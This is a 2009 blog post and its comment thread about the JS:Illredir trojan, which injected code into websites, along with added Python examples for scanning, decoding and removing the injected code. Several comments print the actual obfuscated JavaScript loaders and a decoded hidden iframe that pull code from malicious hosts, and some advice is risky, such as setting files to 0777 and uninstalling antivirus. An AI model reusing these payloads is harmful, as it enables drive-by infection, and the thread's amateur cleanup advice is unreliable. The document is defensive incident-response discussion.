Dec 30, 2009

Trojan Attack: JS:Illredir-B [Trj]

It’s 3.30am and way past my bedtime, but I feel this is extremely important and I must highlight this to everyone.

A few days ago, one of my website clients complained that the blog I set up for them on their server using WordPress could not be accessed. When I checked, it appeared to have a PHP header problem. I had no idea why it occurred, but I upgraded the WordPress installation and that seemed to solve the problem. Because he had that problem, I thought I had better check all my other WordPress blogs on our own hosted servers, and they all had the same problem.

I thought that WordPress was probably having a Christmas party that caused all WordPress blogs to fail. I didn’t have time to check whether all other WordPress users had the same problem, since it was solved easily enough by upgrading the installation.

Later, though, the same client told me that one of their staff who was updating some things on their website (the non-WordPress main section) discovered a Trojan called JS:Illredir-B [Trj] when she accessed their website. A brief Google search using that name unearthed nothing. I found sites quoting similar issues though.

http://www.prelovac.com/vladimir/warning-website-virus-attack

http://forum.avast.com/index.php?topic=52476.0

About the Trojan

What’s so dangerous about Trojans? Basically, a Trojan is harmful software that, while it seems to be doing what you asked it to do, is busy doing other things that you didn’t ask it to do, such as secretly sending information (credit card information, personal information, financial information, etc.) to other people. It could also rewrite certain code or links in your browser so that you are redirected to other websites without your knowledge. For example, you may be trying to visit your bank’s website and key in the website URL manually, but because of the code rewrite in your browser you are rerouted to a phishing website which looks identical.

I’m not sure about what this Trojan really does – I’m not a virus expert. If anyone knows, or when I do find out, I’ll update.

Protect Yourself

I haven’t researched enough or spoken to enough people to find out which of their antiviruses work. It’s in the middle of the night so very few people are awake. All I can say here is, I’m using AVG and this antivirus did not detect the trojan. My client himself who uses Avira also said it was not detected. I’m not here to promote any particular antivirus actually, but my client’s staff (the one who detected it) used Avast Antivirus, so perhaps this may be a good one to use.

http://www.avast.com/

How Do We Tell Which Websites Are Under Attack?

Well, in my case, all the websites I was taking care of appeared to have been attacked. I’ve managed to fix them, but I’ll have to keep an eye on them to make sure that they aren’t attacked again.

I’d like to appeal to everyone out there to be aware of this and to help where you can. My guess is that it is possible that there are many websites out there that have been attacked, but the owners or webmasters are unaware of it. This is because the webpage does not look any different from what it usually does, and this is why it’s so dangerous! Please note that the website owners themselves may not be the perpetrators, and are victims. If you have found any website that has been subjected to the trojan attack, please help out by informing the website owner and/or webmaster right away so that action can be taken.

Here is how you can find out whether the website has been attacked:

  1. Website seems to be loading slower than usual.
  2. When the website is loading, check the status bar. If the status bar indicates that there is some traffic being routed to websites of unusual names that are not related to the current website in any way, it is very possible that the website has been attacked.
  3. The easiest way to find out is to take a look at the page source. Go all the way to the bottom. After </html>, if there is something similar to the following, it indicates that the website has been under attack. This code which appears to be gibberish may also appear anywhere INSIDE the website instead of after </html>.

[Image: Trojan attack]

How to view the page source:

  • Internet Explorer: View menu > Source
  • Firefox: View menu > Page Source
  • Google Chrome: Right-click anywhere on the page > View page source
  • Opera: View menu > Page Source
  • Safari: Right-click anywhere on the page > View Source OR View menu > View source

Fixing The Websites

For those of you who own websites and would like to know how to remove the trojan, it’s easy – just remove the extra code. Not all files are affected. I’ve found that mostly the following files are affected:

  • Files named index or with the word index in their name. E.g. index.html, index.php, index.htm, index_main.htm
  • Files named home or with the word home in their name. E.g. home.html, homepage.htm
  • Files named main or with the word main in their name. E.g. main.html, main_page.htm
  • Files named header or with the word header in their name. E.g. header.php, header.inc, header_main.php
  • Files named footer or with the word footer in their name. E.g. footer.php, footer.inc, footer_main.php
  • All JavaScript files with the .js extension. E.g. javascript.js, functions.js

All folders in your server will be affected, including the root folder, the subfolders, the subdomains, and the subfolders in the subdomains.

While some forums suggest that only Linux servers are affected, I’ve found some of my clients who use Windows servers are also affected.

I think that there are some scripts available for you to download and use on your server so that it will automatically scan and remove the code from all affected files, but I didn’t look for them because some of the other users warned that the files themselves have the virus in them. It’s tedious to remove the codes one by one, of course. What I did was to check the last modified date of the files – in my case, the files were affected on 24th and 25th December 2009. That way, I easily detected which files were modified, and I either removed the code manually or I reuploaded my local copy onto the server. It’s tedious, but I know it works.
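
The checks described above (the file names that are usually hit, extra code after </html>, and the last-modified date) can be combined into a read-only scan. This is an added example, not the author's method or the removal script from the comments; the marker strings are the ones quoted in the comments on this page, and the function names and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile
from datetime import datetime

# Name hints from the article's list; every .js file is a candidate too.
NAME_HINT = re.compile(r"index|home|main|header|footer")
PAGE_EXT = {".html", ".htm", ".php", ".inc"}
CLOSE_HTML = re.compile(rb"</html\s*>", re.I)
# Markers quoted in this page's comments; a starting set, not a full signature list.
MARKERS = [
    ("eval(base64_decode(", re.compile(rb"eval\s*\(\s*base64_decode\s*\(")),
    ("/*Exception*/", re.compile(rb"/\*Exception\*/")),
    ("onload document.write",
     re.compile(rb"window\.onload\s*=\s*function\s*\(\s*\)\s*\{\s*document\.write\(")),
]


def is_candidate(name):
    """True for the file names the article says are usually hit."""
    stem, ext = os.path.splitext(name.lower())
    return ext == ".js" or (ext in PAGE_EXT and bool(NAME_HINT.search(stem)))


def inspect(path, window=None):
    """Return the reasons a file looks tampered with (empty list if none)."""
    with open(path, "rb") as fh:
        data = fh.read()
    reasons = []
    closers = list(CLOSE_HTML.finditer(data))
    # Non-blank bytes after the last </html> are the pattern the article describes.
    if closers and data[closers[-1].end():].strip():
        reasons.append("content after </html>")
    reasons += [label for label, rx in MARKERS if rx.search(data)]
    if window:
        mtime = datetime.fromtimestamp(os.path.getmtime(path))
        if window[0] <= mtime <= window[1]:
            reasons.append("modified in suspect window")
    return reasons


def scan(root, window=None):
    """Walk root and return {relative path: reasons} for flagged candidates."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if is_candidate(name):
                path = os.path.join(dirpath, name)
                reasons = inspect(path, window)
                if reasons:
                    findings[os.path.relpath(path, root)] = reasons
    return findings


def build_sample_site(root):
    """Constructed sample tree: two tampered files, two untouched ones."""
    old = datetime(2009, 11, 1, 12, 0).timestamp()
    hit = datetime(2009, 12, 25, 3, 30).timestamp()
    files = {
        "index.html": (b"<html><body>hi</body></html>\n"
                       b"<script>var a='constructed';</script>\n", hit),
        "home.htm": (b"<html><body>home</body></html>\n", old),
        "blog/header.php": (b"<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); ?>\n"
                            b"<div>head</div>\n", hit),
        "js/functions.js": (b"function add(a, b) { return a + b; }\n", old),
    }
    for rel, (content, mtime) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.utime(path, (mtime, mtime))


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        suspect = (datetime(2009, 12, 24), datetime(2009, 12, 26))
        for rel, reasons in sorted(scan(site, suspect).items()):
            print(rel, "->", ", ".join(reasons))
```

Every hit is a lead to review against your local copy, not proof of infection: a legitimate template can also have content after </html>, and a file you edited yourself will fall inside the date window.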

If anyone has found anything to add to the above, please let me know by email or by commenting. This is pretty dangerous and it’s so malicious… so please be vigilant and do your bit to help out and spread the word.

One more thing I’d like to add: Don’t expect your webhosting provider to inform you or to work on the problem for you. The moment I discovered this, I wrote to all the webhosting providers that my different websites reside on to ask them to check how this could have happened, and to also ask them to inform their clients, and their responses were about the same. They asked me to choose a password that was difficult to guess, and one said I was the only account affected – and this by a company whom I bought several packages from, ALL of which had been attacked.

133 comments

22 pings

  1. cenzi says:

    oops.. here it is:

    http://takingflightinternational.com/phpmyadmin/remove-js-illredir-b.php

    as opposed to

    http://takingflightinternational.com/remove-js-illredir-b.php

    where it gives me the php4 error…

  2. Mike says:

    I just checked your home page and my script was able to fix your virus version which looks like IllRedir-C.
    You must not have copied your infected files to the correct spot. Infected files must be in the same directory as the script or in a subdirectory of it. For example, if you place your script under ~/public_html/remove-js-illredir-b.php, you should place your other websites under: ~/public_html/website1, ~/public_html/website2, ~/public_html/website3 … this way the script will fix all of them at once.
    In your case you have to place the script as oot/phpmyadmin/remove-js-illredir-b.php.

    Hope this helps.

  3. Mike says:

    Posting again here:
    Below is the script removing malicious entries from all affected files. It removes IllRedir-B and C entries.
    Please read instructions before executing the script.

    http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz

    Good luck,
    Mike

  4. Zyenweb says:

    WARNING, PEOPLE! These trojans are mutating faster than we can keep up. There’s a mutation of this trojan called “Illredir-D [Trj]” which I just found out about today. My AVG Free didn’t pick it up, but Avast did.

    @Mike – The script isn’t able to clean this out on the site I tested, so I had to make some mods but I daren’t post it here in case the mods I made are not correct. This trojan is really getting on my nerves!!!

    On behalf of everyone here, I’d like to thank both of you who wrote this script so very, very much for taking the time and trouble to create this script and to present it so neatly so that beginners are able to use it quite easily. Also, thank you for putting a link to this page. You’re a godsend!

  5. Mike says:

    Guys, give me a link to a site infected with IllRedir-D and I will modify the script. I will also add an option to clean any arbitrary code from those files.

  6. Atanas says:

    Hi I just found this page looking for solution how to remove JS:Illredir-D [Trj] that I found today in my hosting. My hosting provider said nothing important about that so I started to look in google.
    I have a hosting with 3 web sites on it and I suppose that all of them will be affected – http://www.jivdom.info, http://www.lotrobg.org, http://www.vegebg.org.
    Do you have a solution, guys?

  7. valdes says:

    I send you a link to a website that contains a trojan JS:Illredir-B [Trj].
    http://www.admcourt-varna.com

  8. valdes says:

    I send you a link to a website that contains a trojan JS:Illredir-D [Trj].
    http://www.admcourt-varna.com

  9. Mike says:

    Don’t see anything wrong with this website. Was it cleaned up already?

  10. Broom says:

    Hi Mike,

    Thanks so much for helping out. I copied the script over to my root directory, but I get a PHP error when I try to run it.

    The url is:

    http://www.broombox.com/remove-js-illredir-b.php

    The error I get is:

    Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or ‘}’ in /home/broom6/public_html/remove-js-illredir-b.php on line 84

    I also tried it in this url:

    http://www.broombox.com/wp-content/plugins/remove-js-illredir-b.php

    And get the same Parse error.

    Thank you so much.

    Broom

  11. Tim says:

    Hi Mike, I have just removed JS:Illredir-D [Trj] from my solarwarwarmair.com site but it rooted deep into my main site http://www.solosol.net try this link: http://www.solosol.net/catalog/index.php I am using (was) using AVG and NOD32 on another computer. A customer using ‘AVAST’ reported it to me yesterday. I changed to AVAST and found JS:Illredir-D [Trj]! Any help greatly appreciated

  12. ekimneems says:

    Does anyone know exactly how this trojan spreads? I used the script to clean all files on all my sites, but it somehow keeps creeping back. It looks like everyone agrees that the source is via FTP, but what is actually injecting the code?

    Also, if a server has been completely cleaned and an updated antivirus client like Avast or NOD32 is installed, will it catch the trojan before it injects any code or only after those JS files have been created? Thanks!!

  13. Mike says:

    You need to change your FTP passwords. And don’t use them with TotalCommander and some other FTP clients with no or very poor encryption.

  14. Jim says:

    I’ve run into this issue on every one of my wordpress sites.

    The only thing I could think of at the time was to go into my Dashboard and re-install WP 2.9.1 …. will this alleviate the issue? Or will it continue to come back up?

    I use FileZilla to access my server, but have not physically typed my passwords in quite some time. Instead I have it set up through the program so all I have to do is select the server to login.

    I could use some help on this. Thank you.

  15. Proudcdn says:

    Hello Mike,

    Fantastic resource for all of us suffering through this crap.

    I am stuck on a linux hosting server running PHP version 4.X (Go DaddY). Is there any script that I can run to clean my sites?

    One such site is http://spmabc.com

    I have about 6 other sites that are infected too.

    Sincerely,

    Sean

  16. Mike says:

    I will try to port the script, so it runs on PHP4 too.
    There is a new mutation; it starts with /*Exception*/. I will include it in the new version.
    Please, wait for my next post.

  17. MIke says:

    Done http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.96
    – Supports PHP 4!
    – Backs up file before modification
    – Contains cure-fix for all files infected with IllRedir-B, IllRedir-C, IllRedir-D, IllRedir-E

    Let me know if you’re having any issues with this release.
    Thanks !

  18. Proudcdn says:

    Hello,

    The script being added to my sites now looks like this:

    try{window.onload=function(){document.write(‘voila-fr.gamespot.com.uol’);Izvperx7vl4q = document.getElementById(‘megaid’).innerHTML + ‘-))c@#$o$m(-#(b^!r$.@&#()s)#)@u@&$^#p@

    It does not have the GNU or Exception in front. Any chance the removal tool could be written to deal with this? It currently skips it.

    Thanks,

    Sean

  19. Mike says:

    I need an url or samples if you guys want cure

  20. MIke says:

    http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.97
    – removes eval(base64_decode()) PHP attack
    – removes try{window.onload=function(){ document.write( document.write()))}catch() {}

    Enjoy ! :) )

  21. Proudcdn says:

    Ok so I am 99.9% certain that the trojan once introduced to your computer invades your FTP client and grabs the log in and password info for your sites. This is how it is able to continually reappear even after you delete and clean install your site.

  22. Mike says:

    Updated the code version 0.98
    @leparachute – version 0.97 of the script was able to remove your version
    The new version removes also Didis version
    Remember to change FTP passwords on the server, don’t store passwords in the FTP client, and don’t use TotalCommander at all.

    Hope this helps

  23. Mike says:

    Per wikipedia http://en.wikipedia.org/wiki/Gumblar
    This virus incorporates a network sniffer, so if you’re infected don’t use http/ftp and/or telnet to access your server. The virus will be able to extract open text passwords. Use https; however, if it’s smart enough it might use a keylogger too.
    So, I would recommend:
    – make sure all infected boxes are shut down
    – boot one box from live linux cd/dvd
    – use browser to change passwords on the server (use https)
    – from now on use only scp, sftp if possible
    – copy virus removal script on the server (into public_html)
    – run the script to fix your websites
    – download http://www.malwarebytes.org/
    – download avast
    – download bootable antivir cd/dvd like kaspersky .iso
    – create bootable antivir dvd: growisofs -Z /dev/dvd=kaspersky.iso
    – boot from bootable antivir
    – try to clean windows partitions
    – if successful boot windows
    – otherwise restore your system from CD/DVD or restore partition
    – install avast, malwarebytes, personal firewall
    – run scans

  24. Mike says:

    Zyen can you approve my last post ?

  25. Cheeko says:

    I use FileZilla. I think it’s not the FTP client but the trojan on the client’s PC.

  26. Mike says:

    Uploaded version 0.99
    http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz
    - restores chmod to 444
    - added latest virus mutations

  27. Hanok says:

    Hi Mike,
    Could you be more specific with what permissions need to be changed when running the script from html? The script file has permissions of 7-5-5.

    I’ve also tried the command line.
    For example, http://jewsandjoes.com/remove-js-illredir-b.php is where I have uploaded the file.

    Hosted with BlueHost, using CPanel. Have cronjobs, but it fails using the commandline you’ve given with error:
    Status: 404 Not Found
    X-Powered-By: PHP/5.2.11
    Content-type: text/html
    No input file specified.

  28. yousf says:

    I traced the trojan back. It expands to the following code:

    var today=new Date(),
    expires=new Date(today.getTime()+2678400000);
    if(navigator.appVersion.indexOf("MSIE 6")!=-1&&document.cookie.indexOf("_mlsdkf=s")==-1)
    {
    ifrm="";
    if(today.getTimezoneOffset()==-1)
    {ifrm=0}
    document.write(ifrm);
    document.cookie="_mlsdkf=s;"+" expires="+expires.toGMTString()+"; "
    }

  30. yousf says:

    the ifrm has this value = “iframe width=1 height=1 src=’http://seccatm.net/b2b/’ style=’display:none’”

  31. Mike says:

    @Hanok – this is because you have a Joomla installation. Try to rename your .htaccess file. Then run the script and then restore the .htaccess file. If you don’t have a .htaccess file then you have to temporarily comment out the place where you’re doing URL rewrites. As far as permissions go, you have to have write permissions to all infected files (for the apache user or other http user configured by your hosting company); it usually means 0777. The script will try to restore it back to 0444, but unless your files are owned by the apache user it won’t be possible. First run the script; it will tell you which files are infected. Then chmod them 0777 and run the script again. If the files are owned by the apache user (or other http server user) the script will fix them and restore them to chmod 0444. Otherwise you will have to restore chmod 0444 on those files.

  32. Josh says:

    Think there might be a new mutation of this. A client site of mine got hit with the following on 2/9/2010.

    var gb=”;var gg=”;this.lf=”";var _=window;var _j;if(_j!=”){_j=’k'};this._x=false;var t=document;var i=’sEc7rEiEp:tE’.replace(/[E7v\:&]/g, ”);var ir;if(ir!=” && ir!=’y'){ir=”};var td;if(td!=” && td!=’c'){td=”};var x;if(x!=’yz’ && x != ”){x=null};_.onload=function(){var _ba;if(_ba!=’ji’ && _ba != ”){_ba=null};try {o=t.createElement(i);var vv=false;o.src=’h&t%t%p&:?/Y/Yt&u&b3e%8Y-Yc3o%mY.3s?k%y3s3p&o?r&t%s?.3c3o3m&.&hYu?r3r?iYy&eYt?-%c&o3m%-&tYr?.?b3e3s?tYn%eYw3h?aYv3e3n&.3r&u%:?830?8&0?/%pYc?a&uYt3o?.3c%o3m%.3cYn?/%p3c3a?u3t&o3.%c&o3m?.?c?n?/%l?oYv?e32&1Yc?n3.?c&o3m?/3g3oYo?g?l3eY.&c&o?m%.3s?g3/3gYo&o3g%l&e%.&c&o?m3/%’.replace(/[%3\?&Y]/g, ”);var yj;if(yj!=”){yj=’ea’};var kd=”;o.setAttribute(‘dpe5fpe_rC’.replace(/[C_p56]/g, ”), “1″);this.zo=”zo”;this.oe=40788;var vr;if(vr!=” && vr!=’ifs’){vr=null};t.body.appendChild(o);} catch(oz){var n=”;};};

  33. Sandun says:

    Hi

    I just found that my site is infected by JS:Illredir-K [Trj]. It is detected by Avast 5. Does anyone have a modified tool for removing this virus? Because ver. 0.99 is not useful any more.

    Thanks

  34. Georgi says:

    Hello,

    This virus infected my website again, and now it is version Q.

  35. Jaakko says:

    And we have IllRedir on forums.. cannot get rid of it.
    first we had Illredir-S and after several cleanups, it mutated to version W

    it puts a script in each index.php and .js file .. after cleanup it returns with different variables…. all in 1 line (similar to Josh’s comment..)

    var s;if(s!=’Ya’ && s!=’q'){s=’Ya’};

    var B=i(‘/7s7uXi7tSe31S071S.Xc3oSmX/SsXuXi3t7eS13031X.7cXo3mS/3o3rSbXi7tSd3o3wSn3lXoXa3d7eXr3.3c7oSmX/SgXo7o3g3lSeS.7cXoSmX/SvSeSoSh7.7c3oSmS.Sp3h7pS’,”7XS3″);var J=i(‘hKtZtZpZ:Z/K/ZmKlKbZ-KcZoKmZ.ZnZeZtZlKoZgK.KcZoKmZ.KdZeKtZiZkZnZeZwKsK-KcKoZmK.KjZeZrKsZeKyKhZoZmZeKsZiZtZeK.KrZuZ:Z’,”KZ”);

    {Ig=null};

    There’s a secret URL and path in those variables.. the browser tries to connect to the site, whatever it is doing :S
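
The samples in the two comments above (Josh's and Jaakko's) hide their strings by interleaving junk characters that a .replace(/[...]/g, '') call, or a small helper, strips out at run time. Added example, not part of any comment or of the removal script: a static decoder that recovers those strings without running the JavaScript. The sample input is constructed (example.test), and the two-argument helper form is assumed to strip the listed characters.

```python
import re

# Blog software turned the pasted samples' ASCII quotes into typographic ones; undo that.
SMART_QUOTES = {0x2018: "'", 0x2019: "'", 0x201C: '"', 0x201D: '"', 0x2033: '"'}

STRING = r"""(?P<q>['"])(?P<body>(?:(?!(?P=q)).)*)(?P=q)"""
# 'j-u-n-k'.replace(/[chars]/g, '')  (the empty '' may survive only as one mangled quote)
REPLACE_RE = re.compile(
    STRING + r"""\s*\.replace\(\s*/\[(?P<cls>(?:\\.|[^\]\\])+)\]/g\s*,\s*['"]{1,2}\s*\)"""
)
# helper('j-u-n-k', "chars"): ASSUMPTION, the helper strips the listed characters.
HELPER_RE = re.compile(
    r"""\b[\w$]+\(\s*""" + STRING
    + r"""\s*,\s*(?P<q2>['"])(?P<junk>(?:(?!(?P=q2)).)+)(?P=q2)\s*\)"""
)

# Constructed sample in the style of the pasted code, smart quotes included.
SAMPLE = r"""var t=document;var tag=‘sXcQrXiQpXt’.replace(/[XQ\:]/g, ”);
o=t.createElement(tag);
o.src=‘hZt%t?p%:Z/%/?e%xZa%m?p%lZe%.?t%eZs%t?/%bZ’.replace(/[%Z\?]/g, ”);
o.setAttribute(‘dpe5fpe_rC’.replace(/[C_p56]/g, ”), “1″);
var J=i(‘hKtZtZpZ:Z/K/ZeKxZaKmZpKlZeK.ZtKeZsKtZ’,”KZ”);"""


def class_chars(cls):
    """Expand a simple character-class body (escapes like \\: but no ranges) to a set."""
    chars, i = set(), 0
    while i < len(cls):
        if cls[i] == "\\" and i + 1 < len(cls):
            i += 1  # an escaped character stands for itself
        chars.add(cls[i])
        i += 1
    return chars


def strip_junk(body, junk):
    return "".join(c for c in body if c not in junk)


def decode_strings(js):
    """Return the hidden strings in order of appearance, without executing anything."""
    js = js.translate(SMART_QUOTES)
    found = []
    for m in REPLACE_RE.finditer(js):
        found.append((m.start(), strip_junk(m.group("body"), class_chars(m.group("cls")))))
    for m in HELPER_RE.finditer(js):
        junk = set(m.group("junk"))
        # Skip ordinary two-string calls: every junk character must occur in the body.
        if junk <= set(m.group("body")):
            found.append((m.start(), strip_junk(m.group("body"), junk)))
    return [text for _pos, text in sorted(found)]


def decoded_urls(js):
    """Decoded strings that are URLs: candidates for blocklists and log searches."""
    return [s for s in decode_strings(js) if re.match(r"https?://", s)]


if __name__ == "__main__":
    for s in decode_strings(SAMPLE):
        print(s)
```

The recovered URLs are what to search for in proxy and web-server logs and what to report to the hosting provider; do not open them in a browser.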

  36. Gumba says:

    Looks like I’m on version S, what the heck do I do to remove this?

  37. Andrew says:

    Hi Mike,

    When trying to start the script with 755 I got such error.
    Running… PHP version: 4.4.9
    Starting …

    Files processed: 6405
    Files fixed: 0

    When using 777 I’m getting Internal Server Error 404.

    I’m using Joomla, htaccess files were renamed.

    Can you recommend something?

    Kind regards,
    Andrew

  38. Mike says:

    Version 1.0 is out. It should fix most of the latest versions; however, if you’re doing something similar to the virus code, your code may be removed too. The script creates backup copies, so if something doesn’t work after you run the script, keep the script output log and restore from the backups.
    @Andrew Try to use the latest version. Also, don’t chmod 777 the script itself, just the other files. Some PHP servers won’t run the script with write/execute permissions.

  39. LuisTim says:

    Hi guys, I had this virus on my site and with Mike’s script I cleaned it and it worked fine until now.
    Now I think that I have a new virus, because Mike’s script isn’t cleaning my website… it cleaned some files but the website still has the virus :(
    Can someone tell me if it is the same virus?
    My site is: http://www.filmes-terror.com

    I am using ESET NOD32 and it shows me that the virus name is:
    JS/TrojanDownloader.Agent.NSM trojan

    I installed AVAST on another PC and it shows me that the virus name is:
    [L] JS:Illredir-W [Trj]

  40. Hatem says:

    Hi everyone,
    the same as LuisTim said
    I had the same virus on my site, and it had changed many things in my pages.
    First of all I noticed that the buttons of the text editor of my forum (I use vBulletin) got frozen.. they do nothing when clicked. I thought my browser had hung or something, then I opened my site from another PC and it was the same,
    and when I opened my forum control panel I found it not working properly; I mean when I click “submit” for something, it doesn’t submit.
    The same problem as with the text editor happened to 2 other applications I use.

    After getting a backup of my website on my PC, the NOD32 antivirus notified me that many files (most of them are index files as Mike said) are infected with ((js/trojandownloader.agent.nsm trojan)), and gave me 2 options: 1- Delete, 2- Rename (just renaming it from index.html to index.vhtml)

    these infected files are modified in march 1, 2010

    Can anyone help???

    P.S. I’ve been running the script for more than 30 minutes and it just says:
    Running… PHP version: 4.4.9
    Starting …

    Is that normal??

    thank you in advance
    best regards
    Hatem

  41. Barak says:

    My sites all starts to fall for this shit virus …. I cleaned it out by hand the files first, but still in some days they just all come back from somewhere. Apart from Avast there is not any antivirus even recognizing something is not okay. My version is mutated to Z already … . What should I try to get rid of it? … Did anyone get really completly rid of it? How did you make that happen?

    Thanks for your attention,
    B.

  42. florencia says:

    I’m from Argentina, I have my pages with this virus and really do not understand anything of what you are talking about. Can you help solve it?
    examples:
    http://www.susanajust.com.ar
    http://www.puntopizza.com.ar

  43. Steve says:

    Hi

    I have JS:Illredir-Y [Trj] trojan on a website running Joomla and detected by avast.

    Any fix for that ?

    Thanks a lot

  44. Hatem says:

    (((((( HERE IS THE SOLUTION ))))))

    1- Download your entire site
    2- Open an infected index file, you will find a strange code at the end of the page, COPY it and paste it in a text file
    3- Using your HTML editor (I’m using DreamWeaver), use the “find and replace” option to search for the code in the entire site and replace it with a “space” for example, that’s how you’ll get rid of all the infected files in a few seconds
    4- Delete all the files from your site (AFTER GETTING A BACKUP in case if anything goes wrong)
    5- Upload your cleaned files

    PLEASE NOTE:
    1- This damn virus may damage some files, so you may notice some functions are not working properly after cleaning up, because all we did was remove the code, but the virus didn’t only put the code in, it also edited (damaged) some files, so if you notice that some functions are not working properly, you will have to compare your files with the original files
    for example, in my forum (VBulletin) I had to replace the files in the “clientscript” folder with the original files that came with the forum when I bought it … because the text editor and some other functions in the admin control panel were not working

    2- The Virus may use 2 codes, I think there was a different code in the javascript files (.js)
    so after cleaning up, don’t forget to open a javascript file (.js) to check if there is another code. if so, use the same steps to clean

    3- After you finish, go to safeweb.norton.com and register to check your site. The site will tell you that your site is queued for checking, and it is going to be checked quickly (my site was checked after a few hours)

    THAT’S IT
    And, one thing I have learned from this virus, to get a backup of my site everyday

    Best Regards :)

    Hatem Tawfik

    BokraLena.com
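
Steps 2 and 3 of the procedure above (copy the injected code, then find and replace it across the downloaded site) as an added example; it is not Hatem's tooling or the removal script linked in other comments. The function name, the minimum payload length and the sample payload are assumptions made for illustration, and backup_dir is assumed to lie outside the site tree. It only removes exact copies of the string you give it, so variants with different variable names need their own pass.

```python
import os
import shutil
import stat
import tempfile

TEXT_EXT = (".html", ".htm", ".php", ".inc", ".js")
MIN_PAYLOAD_LEN = 20  # arbitrary guard (assumption): short strings match legitimate code


def remove_payload(root, payload, backup_dir, dry_run=True):
    """Remove every exact occurrence of payload (bytes) from text files under root.

    Returns {relative path: occurrences found}. With dry_run=True nothing is written.
    """
    if len(payload.strip()) < MIN_PAYLOAD_LEN:
        raise ValueError("payload too short to be a safe search string")
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(TEXT_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            hits = data.count(payload)
            if not hits:
                continue
            rel = os.path.relpath(path, root)
            report[rel] = hits
            if dry_run:
                continue
            # Keep the infected original outside the tree that gets re-uploaded.
            backup = os.path.join(backup_dir, rel)
            os.makedirs(os.path.dirname(backup), exist_ok=True)
            shutil.copy2(path, backup)
            mode = stat.S_IMODE(os.stat(path).st_mode)
            os.chmod(path, mode | stat.S_IWUSR)   # file may be read-only (e.g. 0444)
            with open(path, "wb") as fh:
                fh.write(data.replace(payload, b""))
            os.chmod(path, mode)                  # put the original permissions back
    return report


if __name__ == "__main__":
    # Constructed payload and site copy; nothing here is real malware.
    payload = b"<script>/*constructed payload, not real malware*/</script>"
    with tempfile.TemporaryDirectory() as site, tempfile.TemporaryDirectory() as bak:
        with open(os.path.join(site, "index.html"), "wb") as fh:
            fh.write(b"<html></html>\n" + payload)
        print("dry run:", remove_payload(site, payload, bak))
        print("cleaned:", remove_payload(site, payload, bak, dry_run=False))
        print("left   :", remove_payload(site, payload, bak))
```

Run it once with dry_run=True and read the report before letting it write, then rescan the cleaned copy before uploading.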

  45. LuisTim says:

    hi Hatem,

    thank you for your solution… It gives more work but I think that I will try.
    I only have one doubt… When I tried to download my site, my antivirus didn’t let me… because it detects a virus in the files.
    My question is: Is it safe to disable the antivirus to download the site? Won’t I get infected by opening the files?

    Thank you

  46. Barak says:

    HI Hatem,

    Thank you for your answer. Actually I was already trying this, but my problem was that all the .js files seemed to be infected, or at least that is what avast tells me while downloading all the files. When I wanted to clean them, it did not clean it, only quarantine it. Do you know any solution for this?

    Thank you for your attention,
    B.

  47. Hatem says:

    Hi
    LuisTim & Barak
    Here are the steps that I took to fix my site:

    1- Full antivirus scan to my computer

    2- Uninstall the antivirus (After that don’t open your site via your browser, because the virus will be downloaded to your PC if you did so)

    3- Download your entire site using your FTP program
    (I’m using Filezilla, and I like it because it tells you if there’s some files failed to download)
    REMEMBER not to open any page from your downloaded files via internet explorer or any other browser, because the virus will also be downloaded to your PC if you did so

    4- Edit your files using your HTML editor as I explained in the last post

    5- Before you upload your fixed files, re-install your antivirus to make sure that you cleaned every infected file

    6- If everything ok, delete the files from your host

    7- Upload your fixed files

    Don’t forget to check all the functions on your site like scripts and text editors, to make sure that everything is ok and that the virus didn’t damage any files, and if it did, you will have to replace the infected files with new ones, as I said in the last post; in my forum (vBulletin) I had to replace the files in the “clientscript” folder with the original files that came with the forum when I bought it, and I also replaced some other scripts’ files outside the forum

    I know it will take some time, but I spent more than 4 days searching the web for a solution and I didn’t find any, so I got this idea and it works. It was just 1 hour of work, not counting the time to download and upload

    And sorry for being late to answer you, but I’ve just got back from work

    Best Regards

    BokraLena.com

  48. Chuck says:

    Hey All – I too was infected with the JS:Illredir [Trj] trojan on two of my sites using the avast free antivirus program. My two sites are hosted at 1and1.com. Got the same pat answers to a solution, increase password strength; they took no responsibility at all. Anyway I found that the only true fix was to edit the infected files by hand by removing the ancillary code at the bottom of each infected page (like the code referenced in the above responses – yes it is easy, but if your site is large it could take a bit of time). If you use a site editing program like Dreamweaver you may be able to replace the code string with a space by doing a search and replace throughout the entire site. That should speed things up a bit. BE SURE TO CHECK ALL JAVASCRIPT JS FILES!!! Not just your php & html files. The code WILL BE THERE ALSO and if not deleted from those files will re-propagate through your site once again… Once you have cleaned up all files reset your passwords with type sensitive alpha numeric characters. IF YOU USE ANY OPEN SOURCE PROGRAMS CHANGE ANY STANDARD PASSWORDS AND FOLDER NAME SETTINGS WHEREVER YOU CAN! Hope this helps. Good luck to you all. Blessings.

  50. Arturo says:

    Just received letter of deactivation from bluehost. I called them and asked what the reason was. sure enough, it was because of those stupid js redirect trojans. I’ve been at it the whole day trying to clean my files manually.
